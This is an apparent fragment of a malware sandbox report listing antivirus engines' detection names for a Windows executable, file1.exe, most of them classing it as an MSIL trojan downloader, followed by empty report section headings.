FireEye	Generic.mg.a107fbd4b2549ebb
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious PE
Google	Detected
Avira	HEUR/AGEN.1371472
MAX	malware (ai score=89)
Antiy-AVL	Trojan[Downloader]/MSIL.Tiny
Kingsoft	malware.kb.c.960
Gridinsoft	Trojan.Win32.Downloader.sa
Microsoft	Trojan:MSIL/Tiny.MA!MTB
ViRobot	Trojan.Win.Z.Tiny.10752
ZoneAlarm	HEUR:Trojan-Downloader.MSIL.Upatre.gen
GData	IL:Trojan.MSILZilla.29975
Varist	W32/ABRisk.YRTU-6954
AhnLab-V3	Downloader/Win.FCID.C5496363
BitDefenderTheta	Gen:NN.ZemsilF.36812.am0@aKWOMUg
DeepInstinct	MALICIOUS
VBA32	Downloader.MSIL.Pabin.Heur
TrendMicro-HouseCall	Trojan.Win32.OPERALOADER.YXEHQZ
Tencent	Msil.Trojan-Downloader.Upatre.Fajl
Yandex	Trojan.DL.Tiny!m/Vp8zyzD2Q
huorong	TrojanDownloader/MSIL.Pstinb.a

file1.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All